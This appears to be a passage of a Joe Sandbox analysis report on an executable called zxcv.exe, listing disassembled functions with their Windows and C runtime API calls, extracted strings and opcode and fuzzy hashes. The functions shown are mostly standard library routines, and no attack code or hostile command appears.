Opcode ID: cedf6b15ef201e08950a9590e3cc96283dc0a593f63901964313eeb3d6e4f466
Instruction ID: 1ef9bdac035906b0f6334f9a18ae5d3576163982043b4505b657a13b3e7bb61b
Opcode Fuzzy Hash: cedf6b15ef201e08950a9590e3cc96283dc0a593f63901964313eeb3d6e4f466
Instruction Fuzzy Hash: 6FC15675D51205AFDB20EBA8CC42FEE77F8AF08B00F244465FA45EB2C6D674E9509B60

Function 002415BE Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 281COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 0024163E
_strcspn.LIBCMT ref: 00241662

Strings

E&, xrefs: 0024161D

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: _strcspn
String ID: E&
API String ID: 3709121408-2551161167
Opcode ID: eddb57dee7dfbe2e91eb0b33191a97480a1c529f6ef6889555b4ffafed39afba
Instruction ID: 836d1c69b8939136d32bbccc109ab592615bde2d433dbc673d975c6356eafb80
Opcode Fuzzy Hash: eddb57dee7dfbe2e91eb0b33191a97480a1c529f6ef6889555b4ffafed39afba
Instruction Fuzzy Hash: 28B136B16283419FD728DF24C884AABBBE9FF89344F44491DF99987221D730D964CF52

Function 00262135 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 155fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(00000000,00260DD7,00000000,0025A195,?,?,?,?,?,00262123,00000000,0025A195,00260DD7,?,00000000,0025A195), ref: 00262287
GetLastError.KERNEL32(?,?,?,?,?,00262123,00000000,0025A195,00260DD7,?,00000000,0025A195), ref: 00262294

Strings

#!&, xrefs: 00262173, 002621C4, 002621E1

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ErrorFileLast
String ID: #!&
API String ID: 734332943-2614669749
Opcode ID: d247ec1c1a37f2e5c838f53d7dcfed8ef481174248143ff20a5e5fbd9f6f7a53
Instruction ID: 730901c060dde96ca6d6a592f67232afc1123e5bf1957448070f378905d10230
Opcode Fuzzy Hash: d247ec1c1a37f2e5c838f53d7dcfed8ef481174248143ff20a5e5fbd9f6f7a53
Instruction Fuzzy Hash: 57510132920E06EAEB248F69CC55B9E7B75AF44321F144158FD15A72D2D770E8F8CB90

Function 00262C13 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0026257F), ref: 00262C2C

Strings

u:$, xrefs: 00262CF6, 00262DA0, 00262DE6
<|&, xrefs: 00262D6B

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: DecodePointer
String ID: <|&$u:$
API String ID: 3527080286-2752425788
Opcode ID: 37661c94f4eff7dc7ab274479d0cac8bbe63cd589929f5347ef4af9dea26f604
Instruction ID: 8f6d849689094e981548b6d725b910c31799644746bedd5b300125c4892d3938
Opcode Fuzzy Hash: 37661c94f4eff7dc7ab274479d0cac8bbe63cd589929f5347ef4af9dea26f604
Instruction Fuzzy Hash: 51518B70924D0ACBCF109F68E94C6ADBFB4FF05308F514055D881AB268CBB889F9CB54

Function 00278848 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00278887
__IsNonwritableInCurrentImage.LIBCMT ref: 0027893B

Strings

csm, xrefs: 00278925

Memory Dump Source

Source File: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 73f2a96de005f1e6ec4b1510e602c753a631824e33d570dc704df2bb37d82237
Instruction ID: d855a033b12cfa72ce8fe5a8e7991d8a17f08b2c1de0d49b4c15d65a8f48a98f
Opcode Fuzzy Hash: 73f2a96de005f1e6ec4b1510e602c753a631824e33d570dc704df2bb37d82237
Instruction Fuzzy Hash: F241D634E20209EBCF10DF68C849AAEBBB5EF45314F54C155E91CAB352DB319A61CF92

Function 0024A3FD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0024A422

Strings

MOC, xrefs: 0024A434
RCC, xrefs: 0024A43C

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: bbc037130114fb877631b9fa647eb55c63b9099b1e26f92015ef3997b59eebd1
Instruction ID: 14d08ae21c95fb52812cb5d69e492b8ce60431c2aea920cb45b711ee99e12f68
Opcode Fuzzy Hash: bbc037130114fb877631b9fa647eb55c63b9099b1e26f92015ef3997b59eebd1
Instruction Fuzzy Hash: 9941677290020AAFCF1ADF98CD81AEEBBB5BF48300F158099F904A7211D3359A60DF52

Function 0024AD92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,00000000,?,?,?,?,0024AF0D,00000002,FlsGetValue,00265DE0,FlsGetValue,00000000,?,00249D9D), ref: 0024AE15
GetProcAddress.KERNEL32(00000000,]&), ref: 0024AE1F

Strings

]&, xrefs: 0024AE1B

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: ]&
API String ID: 3013587201-959001208
Opcode ID: 4a9e88eba407977f33925aee4f2d0fb402b3a7b5d7eae1d99df10cf0d9b0627d
Instruction ID: e1d166275203d54810dc0a24c95bdf7cbea141830848e428e2142e3876364343
Opcode Fuzzy Hash: 4a9e88eba407977f33925aee4f2d0fb402b3a7b5d7eae1d99df10cf0d9b0627d
Instruction Fuzzy Hash: 6A11D3317A5122DF8F2BCF54E88089A73A5FF463507240165EA51DB210EB70DD21CBD2

Function 00245E30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00245E3C
std::_Lockit::~_Lockit.LIBCPMT ref: 00245E98

Strings

u:$, xrefs: 00245E63, 00245E7D

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: u:$
API String ID: 593203224-3033614593
Opcode ID: 355538125083002c2d2385d900aef551c69e107b61fcaf240e18cdca40371d45
Instruction ID: 6888fcf785c7e02dd5c92967c6b5741e504b9137419d0b63d892cac13f515e53
Opcode Fuzzy Hash: 355538125083002c2d2385d900aef551c69e107b61fcaf240e18cdca40371d45
Instruction Fuzzy Hash: FF01B131610A25EFCB09DF14D895E9D7BB8EF85750B140099E8459B361DF70EE41CB50

Function 00242274 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0024227B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 002422B3

Part of subcall function 00245EA1: _Yarn.LIBCPMT ref: 00245EC0
Part of subcall function 00245EA1: _Yarn.LIBCPMT ref: 00245EE4

Strings

bad locale name, xrefs: 002422C1

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: f39188195325a77c11ed51c6f03834ae9ca0523b134a4f1868a3541063b4be54
Instruction ID: 0edcf24667269df75a8062717fe5cfc828544c9dbb78464af098fc249211d5d2
Opcode Fuzzy Hash: f39188195325a77c11ed51c6f03834ae9ca0523b134a4f1868a3541063b4be54
Instruction Fuzzy Hash: 88F0177151AB509F83349F7A98C1447FBE4BE292203948A2EE1DEC3A12D770A414CF6A

Function 00273ED6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00273EDD

Strings

ZRB, xrefs: 00273ED8
pdB, xrefs: 00273F19

Memory Dump Source

Source File: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: H_prolog3
String ID: ZRB$pdB
API String ID: 431132790-2606634356
Opcode ID: a80e33e7d8d27686206c715740f2a372a192bd8069830a42d80d814282e980e6
Instruction ID: 4f66721c15c0769b4a388557919ca20a1d704f367d5e3b836bd8b12824f0a3d1
Opcode Fuzzy Hash: a80e33e7d8d27686206c715740f2a372a192bd8069830a42d80d814282e980e6
Instruction Fuzzy Hash: AF0116B0A10625CFCB61DF28C580A5ABBF0BF08304B90886EE489DB711D3B1EA10CF44

Function 0026FC08 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0026FC44

Strings

4/C, xrefs: 0026FC18, 0026FC1C
HPC, xrefs: 0026FC3C, 0026FC43

Memory Dump Source

Source File: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ___std_exception_copy
String ID: 4/C$HPC
API String ID: 2659868963-744383018
Opcode ID: 6776f018aabb3f9a94bd7e418960d7f6b3af012cc20ee3ddf889fb4f8c4f6168
Instruction ID: 136bc567bf7ecf2bd07807e0799c225ef7aa1062ee8a3cd29c5743c626871c11
Opcode Fuzzy Hash: 6776f018aabb3f9a94bd7e418960d7f6b3af012cc20ee3ddf889fb4f8c4f6168
Instruction Fuzzy Hash: F0E0D8B19247119BC614FF64E90584AF3E8DE55710B11C92BF584D3100F7B0D854CBA4

Function 002556A1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 002556E1

Strings

u:$, xrefs: 002556D1
InitializeCriticalSectionEx, xrefs: 002556B1

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx$u:$
API String ID: 2593887523-2539010447
Opcode ID: 76c5462b36bf0e4357b058f49ae4d94045fd9cbacf1b00eecce72e35d71620af
Instruction ID: b6a73befaabde32716ca1c2e5a3868dbfa827b6da6123f8e254a94761391b013
Opcode Fuzzy Hash: 76c5462b36bf0e4357b058f49ae4d94045fd9cbacf1b00eecce72e35d71620af
Instruction Fuzzy Hash: A6E092321B06A8B7CB112F51EC29E9E3F15EF517A1F408410FE0C25160CAF289B09A85

Function 0026FD98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0026FDB4
std::_Lockit::~_Lockit.LIBCPMT ref: 0026FDD1

Strings

HPC, xrefs: 0026FDCD

Memory Dump Source

Source File: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: HPC
API String ID: 593203224-3567667220
Opcode ID: 3bd20d2cc0b4f6be9c7d538794e38dcdd53bcc526d8394b9f7a13e44b100da9f
Instruction ID: 8317783053cd55b16b1dded01c44a0878357cb490ffc4ebc18ceb8ef1da18c30
Opcode Fuzzy Hash: 3bd20d2cc0b4f6be9c7d538794e38dcdd53bcc526d8394b9f7a13e44b100da9f
Instruction Fuzzy Hash: F2F03070924211DFCB28EF14E942799B7E0FB94700F40483EF0D943290EB706994DF86

Function 00273F48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00273F4F
std::locale::_Init.LIBCPMT ref: 00273F70

Part of subcall function 00273BC2: __EH_prolog3.LIBCMT ref: 00273BC9
Part of subcall function 00273BC2: std::_Lockit::_Lockit.LIBCPMT ref: 00273BD4
Part of subcall function 00273BC2: std::locale::_Setgloballocale.LIBCPMT ref: 00273BEF
Part of subcall function 00273BC2: _Yarn.LIBCPMT ref: 00273C05
Part of subcall function 00273BC2: std::_Lockit::~_Lockit.LIBCPMT ref: 00273C45

Strings

wRB, xrefs: 00273F4A

Memory Dump Source

Source File: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID: wRB
API String ID: 3152668004-3198204077
Opcode ID: 5d13306cdc1259202b1c4a6bb385a31eb00881137564f0506b8df4ac25677bf2
Instruction ID: f20c603499819c3a47123d509e463b29b12bd78284f19aa6d959770fd03b6f51
Opcode Fuzzy Hash: 5d13306cdc1259202b1c4a6bb385a31eb00881137564f0506b8df4ac25677bf2
Instruction Fuzzy Hash: 7AE0DF32B31A229BD720BB68404232CF190AB00B10F94C01AF408AB6C2DBF44D215F92

Function 00255527 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0025555B

Strings

u:$, xrefs: 00255551
FlsAlloc, xrefs: 00255537

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc$u:$
API String ID: 2773662609-2725278290
Opcode ID: 7ac3a55c799336ab17a7a6548504aba65e5c696cb995e7e98b635bb52d364770
Instruction ID: 059fe419431750f904451dfaf436fdbec2e6b44e0e95eb150133d08cc0aaca47
Opcode Fuzzy Hash: 7ac3a55c799336ab17a7a6548504aba65e5c696cb995e7e98b635bb52d364770
Instruction Fuzzy Hash: FCE0C231AE0A74B3C61036A6EC2E99EBE05CB52B62B444120FE09161819EF009B086D9

Analysis Process: zxcv.exePID: 5456, Parent PID: 6128COMMON

Non-executed Functions

Function 002457B4 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141memoryfileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(static.lib), ref: 002458DB
GetProcessHeap.KERNEL32(00000008,00000400), ref: 00245906
HeapAlloc.KERNEL32(00000000), ref: 00245909
wsprintfA.USER32(00000000,0026446C), ref: 0024591B
GetStdHandle.KERNEL32(000000F5,00000000,00000000,00000000,00000000), ref: 0024592B
WriteConsoleA.KERNEL32(00000000), ref: 00245932
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0024593A
HeapFree.KERNEL32(00000000), ref: 0024593D

Part of subcall function 002421D2: _strlen.LIBCMT ref: 002421EA

Strings

Window1, xrefs: 002457E3
static.lib, xrefs: 002458A1, 002458AE, 002458DA

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: Heap$Process$AllocConsoleDeleteFileFreeHandleWrite_strlenwsprintf
String ID: Window1$static.lib
API String ID: 658905583-642987920
Opcode ID: 54961ff1092854b965cc1f1dd0718a7faa7bb4b074022a71703b496043ac7fed
Instruction ID: e6d78952db1a0438e78ffc91c7d90ef790ca9f454f6ce537642cb1fdf2c78f12
Opcode Fuzzy Hash: 54961ff1092854b965cc1f1dd0718a7faa7bb4b074022a71703b496043ac7fed
Instruction Fuzzy Hash: E7416A72624311ABE229FF60EC46F6F7798EF45B14F014518FA85672C2DF70AC648AB1

Function 0025DF31 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,O%,00000002,00000000,?,?,?,0025E24F,?,00000000), ref: 0025DFCA
GetLocaleInfoW.KERNEL32(?,20001004,O%,00000002,00000000,?,?,?,0025E24F,?,00000000), ref: 0025DFF3
GetACP.KERNEL32(?,?,0025E24F,?,00000000), ref: 0025E008

Strings

OCP, xrefs: 0025DF85
O%, xrefs: 0025DFE4, 0025E001, 0025DFBB, 0025DFD4, 0025DFBE, 0025DFE7
ACP, xrefs: 0025DF4F

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP$O%
API String ID: 2299586839-2409206020
Opcode ID: cf472513a173241df1474df50368d19017818f8071174ff4698db1f13b4a65d9
Instruction ID: 7f541d057c594448eb1439e9737bb209713a754a7c654b3f46fa60a6c144f738
Opcode Fuzzy Hash: cf472513a173241df1474df50368d19017818f8071174ff4698db1f13b4a65d9
Instruction Fuzzy Hash: 9921C832630102E6EB34CF64C904AA773A6FB54B56B668064FD0BE7644F772DE58C358

Function 0025E106 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 00253E60: GetLastError.KERNEL32(?,00000008,0025A6B1,00000000,0024B2C0), ref: 00253E64
Part of subcall function 00253E60: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF), ref: 00253F06

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0025E212
IsValidCodePage.KERNEL32(00000000), ref: 0025E25B
IsValidLocale.KERNEL32(?,00000001), ref: 0025E26A
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0025E2B2
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0025E2D1

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 16a49c5c15166c08dc0febc7916ab5e2fa1f81e0fc1737e7899f668072301457
Instruction ID: ab66f77608a96c0d31c0bc6419d35ebc77078a7b6398a3a3559298d253274dd0
